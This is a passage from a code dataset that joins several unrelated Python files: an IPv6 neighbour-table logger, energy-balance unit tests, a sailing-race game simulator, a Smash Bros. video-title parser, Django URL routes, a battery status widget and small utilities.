len(\"ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff\")\nMAX_MAC_LEN = len(\"ff:ff:ff:ff:ff:ff\")\n\n_connectors = {\n \"local\": LocalConnector,\n \"ssh\": 
SshConnector,\n}\n\n_systems = {\n \"linux\": LinuxNeighbourTable,\n \"bsd\": FreeBsdNeighbourTable,\n \"solaris\": SolarisNeighbourTable,\n}\n\ndb_url = None\nhosts = []\nmax_age_days = 6*30\n\nwith open(\"/home/grawity/lib/arplog.conf\") as f:\n for line in f:\n if line.startswith(\"#\"):\n continue\n k, v = line.strip().split(\" = \", 1)\n if k == \"db\":\n db_url = v\n elif k == \"host\":\n host_v, conn_v, sys_v, *rest = v.split(\", \")\n hosts.append((host_v, _connectors[conn_v], _systems[sys_v]))\n elif k == \"age\":\n max_age_days = int(v)\n\n#δBase = δ.ext.declarative.declarative_base()\n#\n#class Assoc(δBase):\n# __tablename__ = \"arplog\"\n#\n# id = δ.Column(δ.Integer, δ.Sequence(\"arplog_seq\"), primary_key=True)\n# ip_addr = δ.Column(δ.String(MAX_IPV6_LEN), nullable=False)\n# mac_addr = δ.Column(δ.String(MAX_MAC_LEN), nullable=False)\n# first_seen = δ.Column(δ.Integer)\n# last_seen = δ.Column(δ.Integer)\n\nδEngine = δ.create_engine(db_url)\nδConn = δEngine.connect()\n\nst = δ.sql.text(\"\"\"\n INSERT INTO arplog (ip_addr, mac_addr, first_seen, last_seen)\n VALUES (:ip_addr, :mac_addr, :now, :now)\n ON DUPLICATE KEY UPDATE last_seen=:now\n \"\"\")\n\nfor host, conn_type, nt_type in hosts:\n print(\"connecting to\", host)\n nt = nt_type(conn_type(host))\n now = time.time()\n for item in nt.get_ndp6():\n ip = item[\"ip\"].split(\"%\")[0]\n mac = item[\"mac\"]\n if ip.startswith(\"fe80\"):\n continue\n print(\"- found\", ip, \"->\", mac)\n #assoc = Assoc(ip_addr=ip, mac_addr=mac, first_seen=now, last_seen=now)\n bound_st = st.bindparams(ip_addr=ip, mac_addr=mac, now=now)\n r = δConn.execute(bound_st)\n\nmax_age_secs = max_age_days*86400\n\nprint(\"cleaning up old records\")\nst = δ.sql.text(\"\"\"\n DELETE FROM arplog WHERE last_seen < :then\n \"\"\")\nr = δConn.execute(st.bindparams(then=time.time()-max_age_secs))\n","sub_path":"net/ndpwatch.py","file_name":"ndpwatch.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"607367673","text":"from etm_tools.energy_balance_operations.energy_balance import EnergyBalance\n\n# See the conftest.py for the dummy energy_balance:\n# Electricity Coking coal Anthracite Total\n# Final consumption - industry sector - chemical and petrochemical - energy use 0 9900 1200 10100\n# Gross electricity production - autoproducer electricity only 0 5000 10000 15000\n\ndef test_calculate_total(energy_balance):\n # With an empty row\n energy_balance.add_empty_row('Empty')\n\n assert energy_balance.eb['Total']['Empty'] == 0\n\n energy_balance.calculate_total('Empty')\n\n assert energy_balance.eb['Total']['Empty'] == 0\n\n # Fill in some value\n energy_balance.eb['Electricity']['Empty'] = 10000\n energy_balance.calculate_total('Empty')\n\n assert energy_balance.eb['Total']['Empty'] == 10000\n\n # Fill in a second value\n energy_balance.eb['Anthracite']['Empty'] = 5000\n energy_balance.calculate_total('Empty')\n\n assert energy_balance.eb['Total']['Empty'] == 15000\n\n\ndef test_shift_energy(energy_balance):\n energy_balance.shift_energy('Gross electricity production - autoproducer electricity only',\n 'New flow', {'Coking coal': 900})\n\n assert energy_balance.eb['Coking coal']['New flow'] == 900\n assert energy_balance.eb['Coking coal']['Gross electricity production - autoproducer electricity only'] == 4100\n assert energy_balance.eb['Coking coal']['Gross electricity production - autoproducer electricity only - original'] == 5000\n\n\ndef 
test_add_row_with_energy(energy_balance):\n # Without total\n energy_balance.add_row_with_energy('Some powerplant', {'Electricity': 900}, total=False)\n\n assert energy_balance.eb['Electricity']['Some powerplant'] == 900\n assert energy_balance.eb['Total']['Some powerplant'] == 0\n\n # With total\n energy_balance.add_row_with_energy('Some industry', {'Coking coal': 1000})\n\n assert energy_balance.eb['Coking coal']['Some industry'] == 1000\n assert energy_balance.eb['Total']['Some industry'] == 1000\n\n\ndef test_add_row_from_share(energy_balance):\n energy_balance.add_row_from_share('Gross electricity production - autoproducer electricity only',\n 'My new flow', 0.5)\n\n assert energy_balance.eb['Coking coal']['My new flow'] == 2500\n\n\ndef test_share_to_tj(energy_balance):\n flows = [\n 'Gross electricity production - autoproducer electricity only',\n 'Final consumption - industry sector - chemical and petrochemical - energy use'\n ]\n\n # With one flow\n in_tj = energy_balance.share_to_tj(\n flows[0],\n 0.5,\n ['Coking coal', 'Anthracite'],\n merge_products=True\n )\n assert in_tj == 7500\n\n\n # With two flows\n in_tj = energy_balance.share_to_tj(\n flows,\n 0.5,\n ['Coking coal', 'Anthracite'],\n merge_products=True\n )\n assert in_tj == 13050\n\n # With two flows and unmerged products\n in_tj = energy_balance.share_to_tj(\n flows,\n 0.5,\n ['Coking coal', 'Anthracite'],\n merge_products=False\n )\n assert in_tj == {'Anthracite': 5600.0, 'Coking coal': 7450.0}\n\ndef test_product_shares_to_tj(energy_balance):\n flow = 'Gross electricity production - autoproducer electricity only'\n product_shares = {'Anthracite': 0.5, 'Coking coal': 1.0}\n\n product_amounts = energy_balance.product_shares_to_tj(flow, product_shares)\n\n assert product_amounts['Anthracite'] == 5000\n assert product_amounts['Coking coal'] == 5000\n\n\ndef test_swap_energy(energy_balance):\n from_flow = 'Final consumption - industry sector - chemical and petrochemical - energy use'\n to_flow = 'Gross electricity production - autoproducer electricity only'\n\n energy_balance.swap_energy(\n from_flow,\n to_flow,\n ['Anthracite'], ['Coking coal']\n )\n\n assert energy_balance.eb['Coking coal'][from_flow] == 11100\n assert energy_balance.eb['Anthracite'][from_flow] == 0\n\n assert energy_balance.eb['Coking coal'][to_flow] == 3800\n assert energy_balance.eb['Anthracite'][to_flow] == 11200\n\n\ndef test_swap_energy_from_two_products(energy_balance):\n from_flow = 'Final consumption - industry sector - chemical and petrochemical - energy use'\n to_flow = 'Gross electricity production - autoproducer electricity only'\n\n energy_balance.eb['Product X'] = 1000\n\n # When swapping from two products to one\n energy_balance.swap_energy(\n from_flow,\n to_flow,\n ['Anthracite', 'Product X'], ['Coking coal']\n )\n\n assert energy_balance.eb['Coking coal'][from_flow] == 12100\n assert energy_balance.eb['Anthracite'][from_flow] == 0\n assert energy_balance.eb['Product X'][from_flow] == 0\n\n assert energy_balance.eb['Coking coal'][to_flow] == 2800\n assert energy_balance.eb['Anthracite'][to_flow] == 11200\n assert energy_balance.eb['Product X'][to_flow] == 2000\n\n\ndef test_swap_energy_with_deficit(energy_balance):\n from_flow = 'Gross electricity production - autoproducer electricity only'\n to_flow = 'Final consumption - industry sector - chemical and petrochemical - energy use'\n\n # Trying to swap 10000 Anth for Coal when there is only 9900 Coal available\n energy_balance.swap_energy(\n from_flow,\n to_flow,\n 
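# swap Anthracite out of from_flow for Coking coal drawn from to_flow\n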
['Anthracite'],['Coking coal']\n )\n\n # Should only swap the 9900, 100 Anthracite remains\n assert energy_balance.eb['Coking coal'][from_flow] == 14900\n assert energy_balance.eb['Anthracite'][from_flow] == 100\n\n assert energy_balance.eb['Coking coal'][to_flow] == 0\n assert energy_balance.eb['Anthracite'][to_flow] == 11100\n\n\ndef test_swap_energy_with_deficit_and_backup_flow(energy_balance):\n from_flow = 'Gross electricity production - autoproducer electricity only'\n to_flow = 'Final consumption - industry sector - chemical and petrochemical - energy use'\n backup_flow = 'Some other flow'\n\n energy_balance.add_row_with_energy(backup_flow, {'Coking coal': 900}, total=False)\n\n # Trying to swap 10000 Anth for Coal when there is only 9900 Coal available\n energy_balance.swap_energy(\n from_flow,\n to_flow,\n ['Anthracite'],['Coking coal'],\n backup_flow=backup_flow\n )\n\n assert energy_balance.eb['Coking coal'][from_flow] == 15000\n assert energy_balance.eb['Anthracite'][from_flow] == 0\n\n assert energy_balance.eb['Coking coal'][to_flow] == 0\n assert energy_balance.eb['Anthracite'][to_flow] == 11100\n\n # And the remaining 100 should be swapped with the backup flow\n assert energy_balance.eb['Coking coal'][backup_flow] == 800\n assert energy_balance.eb['Anthracite'][backup_flow] == 100\n\ndef test_swap_energy_with_deficit_and_backup_flow_that_has_defict(energy_balance):\n from_flow = 'Gross electricity production - autoproducer electricity only'\n to_flow = 'Final consumption - industry sector - chemical and petrochemical - energy use'\n backup_flow = 'Some other flow'\n\n energy_balance.add_row_with_energy(backup_flow, {'Coking coal': 50}, total=False)\n\n # Trying to swap 10000 Anth for Coal when there is only 9900 Coal available in to_flow,\n # and only 50 in backup\n energy_balance.swap_energy(\n from_flow,\n to_flow,\n ['Anthracite'],['Coking coal'],\n backup_flow=backup_flow\n )\n\n assert energy_balance.eb['Coking coal'][from_flow] == 14950\n assert energy_balance.eb['Anthracite'][from_flow] == 50\n\n assert energy_balance.eb['Coking coal'][to_flow] == 0\n assert energy_balance.eb['Anthracite'][to_flow] == 11100\n\n # And the remaining 100 should be swapped with the backup flow\n assert energy_balance.eb['Coking coal'][backup_flow] == 0\n assert energy_balance.eb['Anthracite'][backup_flow] == 50\n\n\ndef test_negative_products(energy_balance):\n negative_flow = 'Some flow with negative values'\n energy_balance.add_row_with_energy(negative_flow, {'Coking coal': -50, 'Anthracite': 20}, total=False)\n\n neg = energy_balance.all_negative_products(negative_flow)\n assert 'Coking coal' in neg\n assert not 'Anthracite' in neg\n assert neg['Coking coal'] == 50\n\n\ndef test_load_from_world_balance():\n path = 'tests/fixtures/SG.csv'\n\n eb = EnergyBalance.from_world_balance_file(2019, 'SG', path)\n\n assert 'Transformation input - electricity and heat generation - energy use' in eb.eb.index\n assert eb.all_negative_products('Transformation output - electricity and heat generation - main activity producer electricity only')\n","sub_path":"tools/energy_balance_generator/tests/energy_balance_operations/test_energy_balance.py","file_name":"test_energy_balance.py","file_ext":"py","file_size_in_byte":8564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"617119244","text":"import random\n\n\nclass ImportantNpc:\n def __init__(self, name, prof_bonus, dex, int, cha, distance, bombs):\n self.name = name\n self.prof_bonus = prof_bonus\n 
self.dex = dex\n self.int = int\n self.cha = cha\n self.distance = distance\n self.bombs = bombs\n\n def d20_roll(self):\n return random.randint(1,20)\n\n def start_position(self):\n position = self.d20_roll() + self.dex + self.prof_bonus\n return self.name, 'start position:', position\n\n def chicken(self):\n score = self.d20_roll() + self.cha\n return self.name, 'chicken score:', score\n\n def read_wind(self):\n nature = self.d20_roll() + self.int + self.prof_bonus\n if nature == 20 + self.int + self.prof_bonus:\n self.distance += 60\n print('Crit success')\n elif nature >= 13:\n self.distance += 50\n print('Success')\n elif 13 > nature >= 2 + self.int + self.prof_bonus:\n s_or_t = random.randint(1, 2)\n if s_or_t == 1:\n self.distance += 50\n else:\n self.distance += 25\n print('Fail')\n else:\n self.distance += 25\n print('Crit fail')\n return self.name, 'distance:', self.distance\n\n def round_buoy(self):\n acrobatics = self.d20_roll() + self.dex + self.prof_bonus\n if acrobatics == 20 + self.dex + self.prof_bonus:\n self.distance += 10\n print('Crit success')\n elif acrobatics >= 15:\n print('Success')\n elif 15 > acrobatics >= 2 + self.dex + self.prof_bonus:\n self.distance -= 25\n print('Fail')\n else:\n self.distance -= 25\n print('Crit fail, no spinnaker first round downwind')\n return self.name, 'distance:', self.distance\n\n def downwind_sailing(self):\n check = input('Is your spinnaker up? (yes or no): ')\n if check[0].lower() == 'y':\n dc = 16\n movement = 75\n else:\n dc = 14\n movement = 50\n acrobatics = self.d20_roll() + self.dex + self.prof_bonus\n if acrobatics == 20 + self.dex + self.prof_bonus:\n self.distance += movement + 20\n print('Crit success!')\n elif acrobatics >= dc:\n self.distance += movement\n print('Success')\n elif dc > acrobatics >= 2 + self.dex + self.prof_bonus:\n self.bombs += 1\n if self.bombs == 1:\n if movement == 75:\n self.distance += 35\n else:\n self.distance += 50\n print('Fail')\n print('Bomb count:', self.bombs)\n elif self.bombs == 3:\n print('Fail')\n print('Ship blows up!')\n else:\n print('Fail')\n print('Bomb count:', self.bombs)\n\n else:\n self.bombs += 2\n if self.bombs >= 3:\n print('Crit fail')\n print('The boat blows up!')\n else:\n print('Crit fail')\n print('Bomb count:', self.bombs)\n return self.name, 'distance:', self.distance\n\n\n# -------- L O G I C --------\n\nkeel_spraylog = ImportantNpc('Keel Spraylog',2,5,2,4,0,0)\n\nprint(keel_spraylog.start_position())\n\nprint(keel_spraylog.chicken())\n\nwhile keel_spraylog.distance < 250:\n print(keel_spraylog.read_wind())\n\nprint(keel_spraylog.round_buoy())\n\nwhile keel_spraylog.distance < 500:\n print(keel_spraylog.downwind_sailing())\n if keel_spraylog.bombs >=3:\n break\n","sub_path":"sailorsLeagueNpcs.py","file_name":"sailorsLeagueNpcs.py","file_ext":"py","file_size_in_byte":3648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"133626974","text":"from os import makedirs\nimport csv\nfrom os.path import abspath, exists\nimport pandas as pd\n\ndef write_history_to_csv(file_path, cata_name, info_list):\n cata_history_path = abspath(file_path + \"/\" + cata_name + \".csv\")\n if not exists(file_path):\n makedirs(file_path)\n if not exists(cata_history_path):\n with open(cata_history_path, \"w\", newline='') as csv_file:\n pass\n\n #with open(history_log_path, \"a\") as txt_file:\n #txt_file.write(\"--------\")\n #txt_file.write(\" \".join(info_list[:-1]))\n #txt_file.write(info_list[-1])\n \n with open(cata_history_path, 
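# append mode: each call appends one row to this catalogue's history CSV\n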
\"a\", newline='') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_writer.writerow(info_list)\n print(\"--------{0}--------\".format(cata_name))\n print(\" \".join(info_list[:-1]))\n \ndef check_history_in_csv(file_path, cata_name, cata_path):\n cata_history_path = abspath(file_path + \"/\" + cata_name + \".csv\")\n if not exists(cata_history_path):\n return False\n \n history_df = pd.read_csv(cata_history_path, header=None, encoding='cp1252')\n last_col = history_df.iloc[:,-1]\n \n if cata_path in last_col.unique():\n return True\n else:\n return False","sub_path":"download_scripts/history_writer.py","file_name":"history_writer.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"33233075","text":"# Copyright 2017 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Tests for autoscaler.py\"\"\"\n\nfrom strategies import DOWNSCALE_STRATEGIES\nfrom strategies import UPSCALE_STRATEGIES\n\n\ndef test_downscale():\n downscale_strategy = DOWNSCALE_STRATEGIES['incremental']\n assert downscale_strategy(5) == 3\n assert downscale_strategy(4) == 3\n assert downscale_strategy(3) == 3\n\n\ndef test_upscale():\n upscale_strategy = UPSCALE_STRATEGIES['incremental']\n assert upscale_strategy(3) == 5\n","sub_path":"bigtable/autoscaler/strategies_test.py","file_name":"strategies_test.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"216442508","text":"#!/usr/bin/env python\r\n# -*-coding:utf-8 -*-\r\n\r\nimport multiprocessing\r\nimport time,os\r\n\r\n\r\n'''\r\n time类的用法\r\n'''\r\ndef time_Useage():\r\n i=20\r\n while i>0:\r\n print(\"--------- 1 ----------------\")\r\n time.sleep(10)\r\n i=i-1\r\n\r\n'''\r\n 本方法中 写了两个循环,每次执行这个方式时,第一个循环总是被先执行,第二个循环后执行\r\n'''\r\ndef narmal_process():\r\n i=20\r\n while i>0:\r\n print(\" %s,%s\" %(multiprocessing.current_process().name,multiprocessing.current_process().pid))\r\n time.sleep(0.2)\r\n i=i-1\r\nif __name__ == '__main__':\r\n print(os.getpid(),\"主进程开始...\")\r\n p1=multiprocessing.Process(target=narmal_process)\r\n p2=multiprocessing.Process(target=narmal_process)\r\n\r\n '''\r\n 以下代码 p1 p2 两个子进程会交替执行,也就是异步执行\r\n p1.start()\r\n p2.start()\r\n p1.join()\r\n p2.join()\r\n '''\r\n\r\n '''以下代码两个子进程会按照先后顺序执行,也就是同步执行'''\r\n p1.start()\r\n p1.join()\r\n p2.start()\r\n p2.join()\r\n\r\n print(os.getpid(),\"主进程结束...\")","sub_path":"demo_multiprocessing.py","file_name":"demo_multiprocessing.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"414338325","text":"from datetime import datetime\nimport logging\n\n# Smashvods Libraries\nimport utility\n\nlogger = logging.getLogger(utility.logger_name)\ncolor_list = [\"neutral\", \"normal\", \"default\", \"vanilla\", \"white\", \"black\",\n \"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\", 
\"pink\",\n \"gray\", \"grey\", \"regular\", \"brown\", \"blu\", \"grn\", \"usa\", \"blk\",\n \"#1\", \"#2\", \"master\", \"best\", \"highrank\", \"strong\",\n \"fire\", \"gold\", \"naked\", \"alt\", \"og\", \"p1\", \"p2\", \"p3\", \"p4\",\n \"christmas\", \"halloween\", \"sports\", \"mexican\", \"punk\", \"love\",\n \"beast\", \"vacation\", \"nostalgia\", \"undercover\", \"schoolgirl\"]\nchamp_str_list = [\"grand\", \"winner\", \"loser\", \"pool\", \"bracket\", \"match\", \"gf\",\n \"final\", \"semi\", \"quarter\", \"eighth\", \"single\", \"friendlie\"]\nabbrev_str_list = [\"wf\", \"lf\", \"wsf\", \"ws\", \"lsf\", \"ls\",\n \"wqf\", \"wq\", \"lqf\", \"lq\"]\nsep_str_list = [\"-\", \";\", \":\", \"~\", \"ft.\", \"|\", \"1v1\", \"*\", \"vs\", \"mm\"]\n\n\ndef format_vid_list(vid_list, game_mode):\n start_time = datetime.now()\n nickname_list = create_char_nickname_list(game_mode)\n args = list()\n\n # vid_list: {\"title\" \"date\" \"channelId\" \"videoId\"}\n for video in vid_list:\n orig_title = video[\"title\"]\n c1_title = str()\n c2_title = str()\n p1_title = str()\n p2_title = str()\n\n valid_bracket_count = 0\n\n try:\n new_title = orig_title.replace(\"[\", \"(\").replace(\"]\", \")\")\n new_title = new_title.replace(\"((\", \"(\").replace(\"))\", \")\")\n b1_index = new_title.find(\"(\")\n b2_index = new_title.find(\")\", b1_index + 1)\n\n while b1_index >= 0 and b2_index >= 0:\n # Continue to next iteration if bracket_str too small.\n bracket_str = new_title[b1_index:b2_index + 1]\n if b2_index - b1_index < 3:\n new_title = new_title.replace(bracket_str, str())\n b1_index = new_title.find(\"(\", b1_index)\n b2_index = new_title.find(\")\", b1_index + 1)\n continue\n\n # Continue to next iteration if new_inner_str invalid.\n inner_str = bracket_str[1:-1]\n new_inner_str = format_char_str(\n inner_str, nickname_list, c1_title)\n if not new_inner_str:\n new_title = new_title.replace(bracket_str, str())\n b1_index = new_title.find(\"(\", b1_index)\n b2_index = new_title.find(\")\", b1_index + 1)\n continue\n\n # Set the character 1 and character 2 title.\n valid_bracket_count += 1\n if valid_bracket_count == 1:\n c1_title = new_inner_str\n elif valid_bracket_count == 2:\n c2_title = new_inner_str\n\n # Find the player 1 title.\n if valid_bracket_count == 1 and not p1_title:\n p1_index = find_p1_index(new_title, b1_index, game_mode)\n p1_title = new_title[p1_index:b1_index]\n p2_index = b2_index + 1\n\n # Find the player 2 title.\n if valid_bracket_count == 2 and not p2_title:\n p2_title = new_title[p2_index:b1_index].lower()\n for vs_str in [\"vs.\", \"vs\", \" v \", \"v.\"]:\n if vs_str in p2_title:\n p2_index += p2_title.index(vs_str) + len(vs_str)\n break\n p2_title = new_title[p2_index:b1_index]\n\n # Exit Search if more than two valid brackets found.\n if valid_bracket_count == 3:\n break\n\n b1_index = new_title.find(\"(\", b1_index + len(bracket_str))\n b2_index = new_title.find(\")\", b1_index + 1)\n\n # Check if video should be added\n add_video_flag = True\n if valid_bracket_count != 2:\n add_video_flag = False\n\n for double_str in [\"/\", \"&\", \"+\"]:\n if double_str in p1_title and double_str in p2_title:\n add_video_flag = False\n\n if not add_video_flag:\n continue\n\n # Remove whitespace and sponsors from player strings.\n p1_title = format_player_str(p1_title)\n p2_title = format_player_str(p2_title)\n\n args.append([p1_title, c1_title, p2_title,\n c2_title, game_mode, video[\"id\"]])\n\n except ValueError:\n logger.error(\"ValueError: %s\", orig_title)\n except 
UnboundLocalError:\n logger.error(\"UnboundLocalError: %s\", orig_title)\n except IndexError:\n logger.error(\"IndexError: %s\", orig_title)\n\n finish_time = (datetime.now() - start_time).total_seconds()\n logger.info(\"Formatted %s/%s results in %ss\",\n len(args), len(vid_list), finish_time)\n\n return args\n\n\ndef create_char_nickname_list(game_mode):\n output_data = list()\n query = \"SELECT name,nickname FROM characters\"\n query += \" WHERE game = '\" + game_mode + \"'\"\n char_list = utility.mysql_query(query)\n\n for main in char_list:\n output_data.append([main[\"name\"], format_sv_str(main[\"name\"])])\n if main[\"nickname\"]:\n nicknames = [x.strip() for x in main[\"nickname\"].split(\",\")]\n for nickname in nicknames:\n output_data.append([main[\"name\"], nickname])\n\n return output_data\n\n\ndef format_sv_str(input_string):\n output_string = input_string.lower().replace(\" \", \"\").replace(\"'\", \"\")\n output_string = output_string.replace(\"-\", \"\").replace(\".\", \"\")\n return output_string\n\n\ndef format_char_str(full_char_str, char_name_list, c1_title):\n full_char_str = format_sv_str(full_char_str)\n\n # Split up character list\n split_char = \",\"\n for char_split_str in [\",\", \"/\", \"+\", \";\", \"&\"]:\n if char_split_str in full_char_str:\n split_char = char_split_str\n break\n\n if split_char == \"&\":\n for and_char_str in [\"g&w\", \"game&\", \"&luma\"]:\n if and_char_str in full_char_str:\n split_char = \",\"\n\n if split_char != \"&\":\n full_char_str = full_char_str.replace(\"&\", \"and\")\n char_list = [x.strip() for x in full_char_str.split(split_char)]\n\n # Remove character colors\n color_chars = list()\n colorless_str = str()\n for char_str in char_list:\n for color_name in color_list:\n if char_str.find(color_name) == 0:\n colorless_str = char_str.replace(color_name, \"\")\n break\n\n if colorless_str:\n color_chars.append(colorless_str)\n else:\n color_chars.append(char_str)\n\n char_list = color_chars\n final_chars = list()\n for m in char_name_list:\n if m[1] in char_list:\n final_chars.append(m[0])\n # If the c1 was valid, check for valid color in c2.\n if final_chars:\n return \",\".join(final_chars)\n elif c1_title:\n for color_name in color_list:\n if full_char_str == color_name:\n return c1_title\n return str()\n\n\ndef find_p1_index(new_title, b1_index, game_mode):\n p1_index = 0\n pre_c1_title = new_title[:b1_index].lower()\n p1_list = pre_c1_title.split()\n\n # Check for colons in the entire string.\n if \":\" in pre_c1_title:\n if \":)\" not in pre_c1_title:\n colon_index = pre_c1_title.rfind(\":\")\n if colon_index >= p1_index:\n p1_index = colon_index + len(\":\")\n\n # Check for dashes in the entire string.\n if \" -\" in pre_c1_title:\n dash_index = pre_c1_title.rfind(\" -\")\n if dash_index >= p1_index:\n p1_index = dash_index + 2\n\n # Remove the string most adjacent to the b1_index.\n pre_p1_index = b1_index\n if p1_list:\n pre_p1_index = pre_c1_title.rfind(p1_list[-1])\n p1_list = p1_list[:-1]\n\n # Create a string with the most adjacent string removed.\n if p1_list:\n pre_p1_index = pre_c1_title.rfind(p1_list[-1], 0, pre_p1_index)\n pre_c1_title = pre_c1_title[:pre_p1_index + len(p1_list[-1])]\n\n # Check for game title (ie. ssbm, ssb4, sfv)\n for game_key_str in utility.game_space_keywords[game_mode]:\n if game_key_str in pre_c1_title:\n game_index = pre_c1_title.rfind(game_key_str)\n if game_index >= p1_index:\n p1_index = game_index + len(game_key_str)\n\n for p1_list_str in p1_list:\n # Remove the separator title (ie. 
-, ;, ft., etc)\n for sep_str in sep_str_list:\n if p1_list_str.endswith(sep_str):\n sep_index = pre_c1_title.rfind(p1_list_str)\n if sep_index >= p1_index:\n p1_index = sep_index + len(p1_list_str)\n\n # Remove the champion title (ie. winners, quarters, etc)\n for champ_str in champ_str_list:\n champ_str_flag = False\n if p1_list_str.endswith(champ_str):\n champ_str_flag = True\n elif p1_list_str.endswith(champ_str + \"s\"):\n champ_str_flag = True\n\n if champ_str_flag:\n champ_index = pre_c1_title.rfind(p1_list_str)\n if champ_index >= p1_index:\n p1_index = champ_index + len(p1_list_str)\n\n # Remove abbreviations (ie. WSFs, LFs, etc)\n for abbrev_str in abbrev_str_list:\n abbrev_str_flag = False\n if p1_list_str == abbrev_str:\n abbrev_str_flag = True\n elif p1_list_str == abbrev_str + \"s\":\n abbrev_str_flag = True\n if abbrev_str_flag:\n abbrev_index = pre_c1_title.rfind(p1_list_str)\n if abbrev_index >= p1_index:\n p1_index = abbrev_index + len(p1_list_str)\n\n # Remove string number combinations (ie. SWS 69, #9, etc)\n if p1_list_str[-1].isdigit():\n digit_str_flag = False\n prev_p1_list_index = max(0, p1_list.index(p1_list_str) - 1)\n prev_p1_index = pre_c1_title.rfind(p1_list[prev_p1_list_index])\n dig_search_index = 0\n if not p1_list_str.isdigit():\n digit_str_flag = True\n elif prev_p1_index >= p1_index:\n if not p1_list[prev_p1_list_index].isdigit():\n digit_str_flag = True\n dig_search_index = prev_p1_index\n dig_search_index += len(p1_list[prev_p1_list_index])\n if digit_str_flag:\n dig_index = pre_c1_title.find(p1_list_str, dig_search_index)\n if dig_index >= p1_index:\n p1_index = dig_index + len(p1_list_str)\n\n return p1_index\n\n\ndef format_player_str(player_str):\n player_index_list = [0]\n for strip_str in [\" \", \"-\", \",\", \"/\", \"&\", \" \"]:\n player_str = player_str.lstrip(strip_str).rstrip(strip_str)\n\n if player_str[0:1] == \". \":\n player_index_list.append(2)\n\n if player_str:\n player_index_list = [0]\n for p_sep_str in [\"|\", \"/\", \",\", \"`\", \" \", \"+ \", \" l \"]:\n if p_sep_str in player_str:\n p_sep_index = player_str.rfind(p_sep_str) + len(p_sep_str)\n player_index_list.append(p_sep_index)\n\n player_str = player_str[max(player_index_list):]\n\n for strip_str in [\" \", \"-\", \",\", \"/\", \"&\", \" \"]:\n player_str = player_str.lstrip(strip_str).rstrip(strip_str)\n\n while player_str:\n dot_index = player_str.find(\".\")\n if player_str[:dot_index].isupper() and dot_index > 1:\n if dot_index < (len(player_str) - 1):\n player_str = player_str[dot_index + 1:]\n continue\n break\n\n for strip_str in [\" \", \"-\", \",\", \"/\", \"&\", \" \"]:\n player_str = player_str.lstrip(strip_str).rstrip(strip_str)\n\n return player_str\n","sub_path":"format_tools.py","file_name":"format_tools.py","file_ext":"py","file_size_in_byte":11958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"272011093","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.post_list, name='post_list'),\n path('post//', views.post_detail, name='post_detail'),\n path('post/new/', views.post_new, name='post_new'),\n path('post//edit/', views.post_edit, name='post_edit'),\n path('bio', views.bio_page, name='bio_page'),\n path('cv', views.cv_page, name='cv_page'),\n path('cv/experience/new/', views.experience_new, name='experience_new'),\n path('cv/experience//edit', views.experience_edit, name='experience_edit'),\n path('cv/skill/new/', views.skill_new, name='skill_new'),\n path('cv/project/new/', views.project_new, name='project_new'),\n path('cv/project//edit', views.project_edit, name='project_edit'),\n path('cv/involvement/new/', views.involvement_new, name='involvement_new'),\n path('cv/involvement//edit', views.involvement_edit, name='involvement_edit'),\n]","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"380993866","text":"from widget import *\n\nclass State:\n Charging = 1\n Discharging = 2\n Full = 3\n Unknown = 4\n\n def __init__(self, present, status, capacity):\n self.present = present\n self.status = status\n self.capacity = capacity\n\n def __str__(self):\n if (not self.present):\n return 'BAT --'\n elif (self.status == State.Charging):\n return 'BAT %d+%%' % self.capacity\n elif (self.status == State.Full):\n return 'BAT Full'\n return 'BAT %d%%' % self.capacity\n\nclass StateReader:\n Path = '/sys/class/power_supply/BAT0/'\n\n def __init__(self):\n pass\n\n def GetState(self):\n pres = self.IsPresent()\n if (not pres):\n return State(False, State.Unknown, 0)\n return State(True, self.ReadStatus(), self.ReadCapacity())\n\n def ReadLine(self, path):\n content = None\n with open(path) as f:\n content = f.readline()\n return content\n\n def StateStrToState(self, state):\n if (state == 'Full\\n'):\n return State.Full\n elif (state == 'Charging\\n'):\n return State.Charging\n elif (state == 'Unknown\\n'):\n return State.Unknown\n else:\n return State.Discharging\n\n def IsPresent(self):\n pres = self.ReadLine(StateReader.Path + 'present')\n if (pres[0] == '1'):\n return True\n return False\n\n def ReadStatus(self):\n statusStr = self.ReadLine(StateReader.Path + 'status')\n return self.StateStrToState(statusStr)\n\n def ReadCapacity(self):\n percent = self.ReadLine(StateReader.Path + 'capacity')\n return int(percent)\n\n\n\nclass BatteryWidget(Widget):\n def __init__(self):\n self.frame = WidgetFrame()\n self.SetProp(Prop.name, 'battery')\n self.statereader = StateReader()\n\n def GetColor(self, state):\n if (state.present and state.status == State.Discharging):\n return '#ff7744'\n return '#4477ff'\n\n def DecideUpdateTime(self, state):\n if (state.status == State.Discharging):\n return 0.5\n return 10.0\n\n def Update(self):\n state = self.statereader.GetState()\n self.SetProp(Prop.full_text, str(state))\n self.SetUpdateTime(self.DecideUpdateTime(state))\n color = self.GetColor(state)\n self.SetProp(Prop.color, 